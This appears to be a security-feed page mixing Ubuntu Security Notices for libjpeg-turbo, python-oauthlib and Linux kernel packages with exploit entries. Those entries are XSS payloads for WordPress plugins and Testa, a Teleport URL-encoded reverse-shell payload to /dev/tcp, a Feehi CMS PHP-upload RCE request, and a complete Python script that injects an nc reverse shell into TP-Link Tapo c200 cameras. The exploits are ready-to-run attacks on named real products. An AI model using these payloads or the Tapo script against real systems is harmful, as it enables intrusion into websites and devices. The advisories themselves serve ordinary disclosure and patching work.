Ubuntu Security Notice 5631-1 - It was discovered that libjpeg-turbo incorrectly handled certain EOF characters. An attacker could possibly use this issue to cause libjpeg-turbo to consume resource, leading to a denial of service. This issue only affected Ubuntu 18.04 LTS. It was discovered that libjpeg-turbo incorrectly handled certain malformed jpeg files. An attacker could possibly use this issue to cause libjpeg-turbo to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5631-1September 22, 2022libjpeg-turbo vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in libjpeg-turbo.Software Description:- libjpeg-turbo: library for handling JPEG filesDetails:It was discovered that libjpeg-turbo incorrectly handled certain EOFcharacters. An attacker could possibly use this issue to causelibjpeg-turbo to consume resource, leading to a denial of service. Thisissue only affected Ubuntu 18.04 LTS. (CVE-2018-11813)It was discovered that libjpeg-turbo incorrectly handled certain malformedjpeg files. An attacker could possibly use this issue to causelibjpeg-turbo to crash, resulting in a denial of service. (CVE-2020-17541,CVE-2020-35538)It was discovered that libjpeg-turbo incorrectly handled certain malformedPPM files. An attacker could use this issue to cause libjpeg-turbo tocrash, resulting in a denial of service, or possibly execute arbitrarycode. This issue only affected Ubuntu 20.04 LTS. (CVE-2021-46822)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  libjpeg-turbo8                  2.0.3-0ubuntu1.20.04.3  libturbojpeg                    2.0.3-0ubuntu1.20.04.3Ubuntu 18.04 LTS:  libjpeg-turbo8                  1.5.2-0ubuntu5.18.04.6  libturbojpeg                    1.5.2-0ubuntu5.18.04.6In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5631-1  CVE-2018-11813, CVE-2020-17541, CVE-2020-35538, CVE-2021-46822Package Information:  https://launchpad.net/ubuntu/+source/libjpeg-turbo/2.0.3-0ubuntu1.20.04.3  https://launchpad.net/ubuntu/+source/libjpeg-turbo/1.5.2-0ubuntu5.18.04.6

Ubuntu Security Notice USN-5631-1

WordPress 3dady Real-Time Web Stats plugin version 1.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin 3dady real-time web stats 1.0 - Stored Cross Site Scripting (XSS)# Google Dork: inurl:/wp-content/plugins/3dady-real-time-web-stats/# Date: 2022-08-24# Exploit Author: UnD3sc0n0c1d0# Vendor Homepage: https://profiles.wordpress.org/3dady/# Software Link: https://downloads.wordpress.org/plugin/3dady-real-time-web-stats.zip# Category: Web Application# Version: 1.0# Tested on: Debian / WordPress 6.0.1# CVE : N/A# 1. Technical Description:The 3dady real-time web stats WordPress plugin is vulnerable to stored XSS. Specifically in the dady_input_text and dady2_input_text fields because the user's input is not properly sanitized which allows the insertion of JavaScript code that can exploit the vulnerability.  # 2. Proof of Concept (PoC):  a. Install and activate version 1.0 of the plugin.  b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=3dady).  c. Insert the following payload in any of the visible fields (dady_input_text or dady2_input_text):    " autofocus onfocus=alert(/XSS/)>  d. Save the changes and immediately the popup window demonstrating the vulnerability (PoC) will be executed.  Note: This change will be permanent until you modify the edited fields.

WordPress 3dady Real-Time Web Stats 1.0 Cross Site Scripting

WordPress WP-UserOnline plugin version 2.88.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)# Google Dork: inurl:/wp-content/plugins/wp-useronline/# Date: 2022-08-24# Exploit Author: UnD3sc0n0c1d0# Vendor Homepage: https://github.com/lesterchan/wp-useronline# Software Link: https://downloads.wordpress.org/plugin/wp-useronline.2.88.0.zip# Category: Web Application# Version: 2.88.0# Tested on: Debian / WordPress 6.0.1# CVE : CVE-2022-2941# Reference: https://github.com/lesterchan/wp-useronline/commit/59c76b20e4e27489f93dee4ef1254d6204e08b3c# 1. Technical Description:The WP-UserOnline plugin for WordPress has multiple Stored Cross-Site Scripting vulnerabilities in versions up to, and including 2.88.0. This is due to the fact that all fields in the “Naming Conventions” section do not properly sanitize user input, nor escape it on output. This makes it possible for authenticated attackers, with administrative privileges, to inject JavaScript code into the setting that will execute whenever a user accesses the injected page.  # 2. Proof of Concept (PoC):  a. Install and activate version 2.88.0 of the plugin.  b. Go to the plugin options panel (http://[TARGET]/wp-admin/options-general.php?page=useronline-settings).  c. Identify the "Naming Conventions" section and type your payload in any of the existing fields. You can use     the following payload:    <script>alert(/XSS/)</script>  d. Save the changes and now go to the Dashboard/WP-UserOnline option. As soon as you click here, your payload      will be executed.Note: This change will be permanent until you modify the edited fields.

WordPress WP-UserOnline 2.88.0 Cross Site Scripting

Ubuntu Security Notice 5632-1 - Sebastian Chnelik discovered that OAuthLib incorrectly handled certain redirect uris. A remote attacker could possibly use this issue to cause OAuthLib to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5632-1September 22, 2022python-oauthlib vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:OAuthLib could be made to crash if it received specially crafted networktraffic.Software Description:- python-oauthlib: generic, spec-compliant implementation of OAuth for Python3Details:Sebastian Chnelik discovered that OAuthLib incorrectly handled certainredirect uris. A remote attacker could possibly use this issue to causeOAuthLib to crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  python3-oauthlib                3.2.0-1ubuntu0.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5632-1  CVE-2022-36087Package Information:  https://launchpad.net/ubuntu/+source/python-oauthlib/3.2.0-1ubuntu0.1

Ubuntu Security Notice USN-5632-1

Teleport version 10.1.1 suffers from a remote code execution vulnerability.

    # Exploit Title: Teleport v10.1.1 - Remote Code Execution (RCE)# Date: 08/01/2022# Exploit Author: Brandon Roach & Brian Landrum# Vendor Homepage: https://goteleport.com# Software Link: https://github.com/gravitational/teleport# Version: < 10.1.2# Tested on: Linux# CVE: CVE-2022-36633Proof of Concept (payload):https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2=f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%3=0%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?=method=3DiamDecoded payload:"/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #

Teleport 10.1.1 Remote Code Execution

Feehi CMS version 2.1.1 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)# Date: 22-08-2022# Exploit Author: yuyudhn# Vendor Homepage: https://feehi.com/# Software Link: https://github.com/liufee/cms# Version: 2.1.1 (REQUIRED)# Tested on: Linux, Docker# CVE : CVE-2022-34140# Proof of Concept:1. Login using admin account at http://feehi-cms.local/admin2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php# Burp request example:POST /admin/index.php?r=ad%2Fcreate HTTP/1.1Host: feehi-cms.localContent-Length: 1530Cache-Control: max-age=0sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://feehi-cms.localContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://feehi-cms.local/admin/index.php?r=ad%2FcreateAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7DConnection: close------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="_csrf_backend"FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[name]"rce------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[tips]"rce at Ad management------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[input_type]"1------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"Content-Type: image/png<?php phpinfo();------WebKitFormBoundaryFBYJ8wfp9LBoF4xgContent-Disposition: form-data; name="AdForm[link]"--------------

Feehi CMS 2.1.1 Remote Code Execution

Ubuntu Security Notice 5634-1 - Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter subsystem in the Linux kernel did not properly handle rules that truncated packets below the packet header size. When such rules are in place, a remote attacker could possibly use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5634-1September 22, 2022linux-oem-5.17 vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:The system could be made to crash if it received specially craftednetwork traffic.Software Description:- linux-oem-5.17: Linux kernel for OEM systemsDetails:Domingo Dirutigliano and Nicola Guerrera discovered that the netfiltersubsystem in the Linux kernel did not properly handle rules that truncated packets below the packet header size. When such rules are in place, a remote attacker could possibly use this to cause a denial of service (system crash).Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:   linux-image-5.17.0-1017-oem     5.17.0-1017.18   linux-image-oem-22.04           5.17.0.1017.16   linux-image-oem-22.04a          5.17.0.1017.16After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-5634-1   CVE-2022-36946Package Information:   https://launchpad.net/ubuntu/+source/linux-oem-5.17/5.17.0-1017.18

Ubuntu Security Notice USN-5634-1

Testa Online Test Management System version 3.5.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)# Date: 28/08/2022# Exploit Author: Ashkan Moghaddas# Vendor Homepage: https://testa.cc# Software Link: https://download.aftab.cc/products/testa/Testa_wos_2.0.1.zip# Version: 3.5.1# Tested on: Windows/Linux# Proof of Concept:# 1- Install Testa 3.5.1# 2- Go to https://localhost.com/login.php?redirect=XXXX# 3- Add payload to the Tab, the XSS Payload: %22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E# 4- XSS has been triggered.# Go to this url "https://localhost.com/login.php?redirect=%22%3E%3Cscript%3Ealert(%22Ultraamooz.com%22)%3C/script%3E"XSS will trigger.

Testa 3.5.1 Cross Site Scripting

Ubuntu Security Notice 5633-1 - It was discovered that the framebuffer driver on the Linux kernel did not verify size limits when changing font or screen size, leading to an out-of-bounds write. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Duoming Zhou discovered that race conditions existed in the timer handling implementation of the Linux kernel's Rose X.25 protocol layer, resulting in use-after-free vulnerabilities. A local attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-5633-1  
September 22, 2022

linux-gcp, linux-gke, linux-raspi vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems  
- linux-gke: Linux kernel for Google Container Engine (GKE) systems  
- linux-raspi: Linux kernel for Raspberry Pi systems

Details:

It was discovered that the framebuffer driver on the Linux kernel did   
not verify size limits when changing font or screen size, leading to an   
out-of-bounds write. A local attacker could use this to cause a denial   
of service (system crash) or possibly execute arbitrary code.   
(CVE-2021-33655)

Duoming Zhou discovered that race conditions existed in the timer   
handling implementation of the Linux kernel's Rose X.25 protocol layer,   
resulting in use-after-free vulnerabilities. A local attacker could use   
this to cause a denial of service (system crash). (CVE-2022-2318)

Roger Pau Monné discovered that the Xen virtual block driver in the   
Linux kernel did not properly initialize memory pages to be used for   
shared communication with the backend. A local attacker could use this   
to expose sensitive information (guest kernel memory). (CVE-2022-26365)

Roger Pau Monné discovered that the Xen paravirtualization frontend in   
the Linux kernel did not properly initialize memory pages to be used for   
shared communication with the backend. A local attacker could use this   
to expose sensitive information (guest kernel memory). (CVE-2022-33740)

It was discovered that the Xen paravirtualization frontend in the Linux  
kernel incorrectly shared unrelated data when communicating with certain  
backends. A local attacker could use this to cause a denial of service  
(guest crash) or expose sensitive information (guest kernel memory).  
(CVE-2022-33741, CVE-2022-33742)

Jan Beulich discovered that the Xen network device frontend driver in   
the Linux kernel incorrectly handled socket buffers (skb) references   
when communicating with certain backends. A local attacker could use   
this to cause a denial of service (guest crash). (CVE-2022-33743)

Oleksandr Tyshchenko discovered that the Xen paravirtualization platform   
in the Linux kernel on ARM platforms contained a race condition in   
certain situations. An attacker in a guest VM could use this to cause a   
denial of service in the host OS. (CVE-2022-33744)

It was discovered that the virtio RPMSG bus driver in the Linux kernel  
contained a double-free vulnerability in certain error conditions. A   
local attacker could possibly use this to cause a denial of service   
(system crash). (CVE-2022-34494, CVE-2022-34495)

Domingo Dirutigliano and Nicola Guerrera discovered that the netfilter  
subsystem in the Linux kernel did not properly handle rules that   
truncated packets below the packet header size. When such rules are in   
place, a remote attacker could possibly use this to cause a denial of   
service (system crash). (CVE-2022-36946)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1015-raspi   5.15.0-1015.17  
   linux-image-5.15.0-1015-raspi-nolpae  5.15.0-1015.17  
   linux-image-5.15.0-1016-gke     5.15.0-1016.19  
   linux-image-5.15.0-1018-gcp     5.15.0-1018.24  
   linux-image-gcp                 5.15.0.1018.16  
   linux-image-gke                 5.15.0.1016.18  
   linux-image-gke-5.15            5.15.0.1016.18  
   linux-image-raspi               5.15.0.1015.14  
   linux-image-raspi-nolpae        5.15.0.1015.14

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5633-1  
   CVE-2021-33655, CVE-2022-2318, CVE-2022-26365, CVE-2022-33740,  
   CVE-2022-33741, CVE-2022-33742, CVE-2022-33743, CVE-2022-33744,  
   CVE-2022-34494, CVE-2022-34495, CVE-2022-36946

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1018.24  
   https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1016.19  
   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1015.17

Ubuntu Security Notice USN-5633-1

TP-Link Tapo c200 version 1.1.15 suffers from a remote code execution vulnerability.

    # Exploit Title: TP-Link Tapo c200 1.1.15 - Remote Code Execution (RCE)# Date: 02/11/2022# Exploit Author: hacefresko# Vendor Homepage: https://www.tp-link.com/en/home-networking/cloud-camera/tapo-c200/# Version: 1.1.15 and below# Tested on: 1.1.11, 1.1.14 and 1.1.15# CVE : CVE-2021-4045# Write up of the vulnerability: https://www.hacefresko.com/posts/tp-link-tapo-c200-unauthenticated-rceimport requests, urllib3, sys, threading, osurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)PORT = 1337REVERSE_SHELL = 'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f'NC_COMMAND = 'nc -lv %d' % PORT # nc command to receive reverse shell (change it depending on your nc version)if len(sys.argv) < 3:    print("Usage: python3 pwnTapo.py <victim_ip> <attacker_ip>")    exit()victim = sys.argv[1]attacker = sys.argv[2]print("[+] Listening on %d" % PORT)t = threading.Thread(target=os.system, args=(NC_COMMAND,))t.start()print("[+] Serving payload to %s\n" % victim)url = "https://" + victim + ":443/"json = {"method": "setLanguage", "params": {"payload": "';" + REVERSE_SHELL % (attacker, PORT) + ";'"}}requests.post(url, json=json, verify=False)

Source

Packet Storm